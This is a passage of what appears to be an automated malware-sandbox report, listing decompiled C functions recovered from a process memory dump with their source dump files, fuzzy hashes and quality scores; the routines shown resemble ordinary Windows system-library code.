                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x2bed360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E02B3FA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1033;
                        				if(E02B17D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 133d0ae560780e30d2d11680d2156afce1d15bd5d2100a386c3caaeaeab0af12
                        • Instruction ID: ce4d93f3f90c42a29dee7691463426b10fe3f5c7f17671561f54b3448368d059
                        • Opcode Fuzzy Hash: 133d0ae560780e30d2d11680d2156afce1d15bd5d2100a386c3caaeaeab0af12
                        • Instruction Fuzzy Hash: A6015271E00618AFCB15DFA9D841EAEB7B8EF44710F404096F914EB280EAB49A41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E02BB14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x2bed360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E02B3FA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1034;
                        				if(E02B17D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7507dd2f331328ecc9c354ed4008976ce7424e6086683d096bf982a5d47b3c20
                        • Instruction ID: bfc6b31f15e4ee4f8425e6aab8d2b6857ef6603fc7869561b204f4c33109ad36
                        • Opcode Fuzzy Hash: 7507dd2f331328ecc9c354ed4008976ce7424e6086683d096bf982a5d47b3c20
                        • Instruction Fuzzy Hash: E1015E71E01258AFCB15DFA9D845FAEBBB8EF45710F4040A6F915EB281DAB4DA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E02AF58EC(intOrPtr __ecx) {
                        				signed int _v8;
                        				char _v28;
                        				char _v44;
                        				char _v76;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t10;
                        				intOrPtr _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_v8 =  *0x2bed360 ^ _t29;
                        				_t10 =  *[fs:0x30];
                        				_t27 = __ecx;
                        				if(_t10 == 0) {
                        					L6:
                        					_t28 = 0x2ad5c80;
                        				} else {
                        					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                        					if(_t16 == 0) {
                        						goto L6;
                        					} else {
                        						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                        					}
                        				}
                        				if(E02AF5943() != 0 &&  *0x2be5320 > 5) {
                        					E02B77B5E( &_v44, _t27);
                        					_t22 =  &_v28;
                        					E02B77B5E( &_v28, _t28);
                        					_t11 = E02B77B9C(0x2be5320, 0x2adbf15,  &_v28, _t22, 4,  &_v76);
                        				}
                        				return E02B3B640(_t11, _t17, _v8 ^ _t29, 0x2adbf15, _t27, _t28);
                        			}
















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f204e4443e4a187f7fe01b00e28cc77f5e331baffad9f875cbad4a6a7871d94
                        • Instruction ID: e14c85843e65dbf3e31e93e226828d8f68b59603b85ebe2792668a6e8d978fe5
                        • Opcode Fuzzy Hash: 2f204e4443e4a187f7fe01b00e28cc77f5e331baffad9f875cbad4a6a7871d94
                        • Instruction Fuzzy Hash: 87018431E00508DBCB58DBA9D8909AFB7ADEF44264BD540A9AE169B344DE20DD01CA90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B0B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                        				signed char _t11;
                        				signed char* _t12;
                        				intOrPtr _t24;
                        				signed short* _t25;
                        
                        				_t25 = __edx;
                        				_t24 = __ecx;
                        				_t11 = ( *[fs:0x30])[0x50];
                        				if(_t11 != 0) {
                        					if( *_t11 == 0) {
                        						goto L1;
                        					}
                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                        					L2:
                        					if( *_t12 != 0) {
                        						_t12 =  *[fs:0x30];
                        						if((_t12[0x240] & 0x00000004) == 0) {
                        							goto L3;
                        						}
                        						if(E02B17D50() == 0) {
                        							_t12 = 0x7ffe0385;
                        						} else {
                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t12 & 0x00000020) == 0) {
                        							goto L3;
                        						}
                        						return E02B77016(_a4, _t24, 0, 0, _t25, 0);
                        					}
                        					L3:
                        					return _t12;
                        				}
                        				L1:
                        				_t12 = 0x7ffe0384;
                        				goto L2;
                        			}








                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: 243e330ba85cf1a3deee2964009e24cc9a60906d9a01d92fca1df7da84f62e04
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 10018F722009849FD327871CC988F667BE8FB45758F0900E1F919CBB91EB38DC80C621
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                        				char _v8;
                        				void* _v11;
                        				unsigned int _v12;
                        				void* _v15;
                        				void* __esi;
                        				void* __ebp;
                        				char* _t16;
                        				signed int* _t35;
                        
                        				_t22 = __ebx;
                        				_t35 = __ecx;
                        				_v8 = __edx;
                        				_t13 =  !( *__ecx) + 1;
                        				_v12 =  !( *__ecx) + 1;
                        				if(_a4 != 0) {
                        					E02BC165E(__ebx, 0x2be8ae4, (__edx -  *0x2be8b04 >> 0x14) + (__edx -  *0x2be8b04 >> 0x14), __edi, __ecx, (__edx -  *0x2be8b04 >> 0x14) + (__edx -  *0x2be8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                        				}
                        				E02BBAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                        				if(E02B17D50() == 0) {
                        					_t16 = 0x7ffe0388;
                        				} else {
                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				if( *_t16 != 0) {
                        					_t16 = E02BAFE3F(_t22, _t35, _v8, _v12);
                        				}
                        				return _t16;
                        			}












                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c96e1f42edda5ee82f6a097ec2ba7cbe690ebdc28c6f1c8598e1a25e5471e27
                        • Instruction ID: 656feb9f95ca5ddc492120d224573806ef588e95a60b89cf1c1b1099a3869357
                        • Opcode Fuzzy Hash: 5c96e1f42edda5ee82f6a097ec2ba7cbe690ebdc28c6f1c8598e1a25e5471e27
                        • Instruction Fuzzy Hash: ED0128725147419BC711EB2CC944B5A77E6EF84314F1486ADF88AA3691DF31D840CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02BAFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x2bed360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E02B3FA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x266;
                        				if(E02B17D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d72517d501e5e292e7a33581f588d76c3b47fff3eabf4e4b837caeca3cd87e7d
                        • Instruction ID: 5f5333b25d85e7cf91f5fc4007addb9777ddff6238958bc3a6c89f5fd04e4535
                        • Opcode Fuzzy Hash: d72517d501e5e292e7a33581f588d76c3b47fff3eabf4e4b837caeca3cd87e7d
                        • Instruction Fuzzy Hash: A8018471E01608ABCB14DFA9D845FBEB7B8EF45700F4040A6FA10AB290DA719A01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02BAFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x2bed360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E02B3FA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x267;
                        				if(E02B17D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a68085b52b0b654d5c60cb7149670b1c1b814c0c36089606f18e2623a339e7b
                        • Instruction ID: efa8b32db12300c28c9f01cc567a4690faf577156aa3cc170ed859ecfbbcfdc6
                        • Opcode Fuzzy Hash: 4a68085b52b0b654d5c60cb7149670b1c1b814c0c36089606f18e2623a339e7b
                        • Instruction Fuzzy Hash: 1F018F71E04208ABCB14DFA9D845FBEBBB9EF44704F0040A6F914AB291DA719A11CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02BC8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				short _v66;
                        				char _v72;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v12 =  *0x2bed360 ^ _t32;
                        				_t31 = _a8;
                        				_t30 = _a12;
                        				_v66 = 0x1c20;
                        				_v40 = __ecx;
                        				_v36 = __edx;
                        				_v32 = _a4;
                        				_v28 = _a8;
                        				_v24 = _a12;
                        				if(E02B17D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v72);
                        				_push(0x14);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2d301971acc0ba64ceab0d1346091f7a958dda8868a394d52a4a3f8cddd913b
                        • Instruction ID: b3d00af36910657094c295bfe727cc933017638924530b00e7bf70c5d52a7a68
                        • Opcode Fuzzy Hash: d2d301971acc0ba64ceab0d1346091f7a958dda8868a394d52a4a3f8cddd913b
                        • Instruction Fuzzy Hash: 9E012CB1A0061DAFCB05DFA9D9419AEB7B8EF48310F10409AF914E7351DB74A900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02BC8ED6(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				short _v62;
                        				char _v68;
                        				signed char* _t29;
                        				intOrPtr _t35;
                        				intOrPtr _t41;
                        				intOrPtr _t42;
                        				signed int _t43;
                        
                        				_t40 = __edx;
                        				_v8 =  *0x2bed360 ^ _t43;
                        				_v28 = __ecx;
                        				_v62 = 0x1c2a;
                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                        				_v24 = __edx;
                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                        				if(E02B17D50() == 0) {
                        					_t29 = 0x7ffe0386;
                        				} else {
                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v68);
                        				_push(0x1c);
                        				_push(0x20402);
                        				_push( *_t29 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbe5b73f2e71d4e94467a5e67b2866a6236cd04c51ef224b76f695541176933a
                        • Instruction ID: 9cd3795f666e667401f2b357a0c86f931d3bd9c5d83fd69a72b256f6115447fb
                        • Opcode Fuzzy Hash: bbe5b73f2e71d4e94467a5e67b2866a6236cd04c51ef224b76f695541176933a
                        • Instruction Fuzzy Hash: 6A11CC70E006599FDB05DFA9D541AAEF7F4FB08300F1446AAE519EB782E6749940CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02AFDB60(signed int __ecx) {
                        				intOrPtr* _t9;
                        				void* _t12;
                        				void* _t13;
                        				intOrPtr _t14;
                        
                        				_t9 = __ecx;
                        				_t14 = 0;
                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                        					_t13 = 0xc000000d;
                        				} else {
                        					_t14 = E02AFDB40();
                        					if(_t14 == 0) {
                        						_t13 = 0xc0000017;
                        					} else {
                        						_t13 = E02AFE7B0(__ecx, _t12, _t14, 0xfff);
                        						if(_t13 < 0) {
                        							L02AFE8B0(__ecx, _t14, 0xfff);
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                        							_t14 = 0;
                        						} else {
                        							_t13 = 0;
                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                        						}
                        					}
                        				}
                        				 *_t9 = _t14;
                        				return _t13;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: 950b1b915afb6bc08b2dfebf15f458067c0ac7793c9eebbe625de744f01c25fc
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: E3F06833241A629BD7736FD549C4B57A6A69F81A60F150075B7059B244CE788C029AD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02AFB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                        				signed char* _t13;
                        				intOrPtr _t22;
                        				char _t23;
                        
                        				_t23 = __edx;
                        				_t22 = __ecx;
                        				if(E02B17D50() != 0) {
                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                        				} else {
                        					_t13 = 0x7ffe0384;
                        				}
                        				if( *_t13 != 0) {
                        					_t13 =  *[fs:0x30];
                        					if((_t13[0x240] & 0x00000004) == 0) {
                        						goto L3;
                        					}
                        					if(E02B17D50() == 0) {
                        						_t13 = 0x7ffe0385;
                        					} else {
                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                        					}
                        					if(( *_t13 & 0x00000020) == 0) {
                        						goto L3;
                        					}
                        					return E02B77016(0x14a4, _t22, _t23, _a4, _a8, 0);
                        				} else {
                        					L3:
                        					return _t13;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 71691deb4e4790ebd7f799e7983518e3aad77581572cfd36cd26e941e769ac74
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 7D01F9322005849BD322975DC844F59BBB9EF45758F0804E1FE248B6B1EF78C840D724
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02B8FE87(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_v8 =  *0x2bed360 ^ _t35;
                        				_v16 = __ecx;
                        				_v54 = 0x1722;
                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                        				if(E02B17D50() == 0) {
                        					_t21 = 0x7ffe0382;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6b345fd2220bd3763a19af09abd5b2295a1e5fd0f19fb613fd9aa37081b1417e
                        • Instruction ID: b6bb6a355883fcc24185713cff3dd0316deaef441ebca1c4247000de511c65d1
                        • Opcode Fuzzy Hash: 6b345fd2220bd3763a19af09abd5b2295a1e5fd0f19fb613fd9aa37081b1417e
                        • Instruction Fuzzy Hash: 2C011271A0060DEFCB14EFA8D545A6EB7F4EF04304F544599E519DB382DA75D901CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E02BB131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x2bed360 ^ _t32;
                        				_v20 = _a4;
                        				_v12 = _a8;
                        				_v24 = __ecx;
                        				_v16 = __edx;
                        				_v50 = 0x1021;
                        				if(E02B17D50() == 0) {
                        					_t18 = 0x7ffe0380;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d96333928a165a129c422baaa81988b6d959c2747df860eb6e145fbb28fc2192
                        • Instruction ID: dead405be35b54c285eee8d6aeac0e8dc0225f90e59ce6101c096b36ae3eef0a
                        • Opcode Fuzzy Hash: d96333928a165a129c422baaa81988b6d959c2747df860eb6e145fbb28fc2192
                        • Instruction Fuzzy Hash: CD011971A05608AFCB04EFA9D545AAEB7F4EF08700F408099F815EB381EA74DA00CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E02BC8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x2bed360 ^ _t32;
                        				_v16 = __ecx;
                        				_v50 = 0x1c2c;
                        				_v24 = _a4;
                        				_v20 = _a8;
                        				_v12 = __edx;
                        				if(E02B17D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f0ded7dd5ccd2921d5ae135e82ef3862d106231cab54b2e387cef07ec012c3c
                        • Instruction ID: d3ec258a648c88a6c5f1462ce75760d7570d41ac008bd3645c55e2ed251de501
                        • Opcode Fuzzy Hash: 9f0ded7dd5ccd2921d5ae135e82ef3862d106231cab54b2e387cef07ec012c3c
                        • Instruction Fuzzy Hash: 66013C74A0060CAFCB05EFA8D545AAEB7B5EF18300F508499F915EB391EA74DA00DB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02BB1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t15;
                        				intOrPtr _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_t26 = __edx;
                        				_v8 =  *0x2bed360 ^ _t29;
                        				_v12 = _a4;
                        				_v20 = __ecx;
                        				_v16 = __edx;
                        				_v46 = 0x1024;
                        				if(E02B17D50() == 0) {
                        					_t15 = 0x7ffe0380;
                        				} else {
                        					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v52);
                        				_push(0xc);
                        				_push(0x20402);
                        				_push( *_t15 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec0c49ccbc30ddae079f8cedb02e3033c4ee9264d6420c4d0a93526b052587f5
                        • Instruction ID: e7dbad4e20f827211ee452dc688dffdb32189642b4e54e05f6033befe1a1fc8c
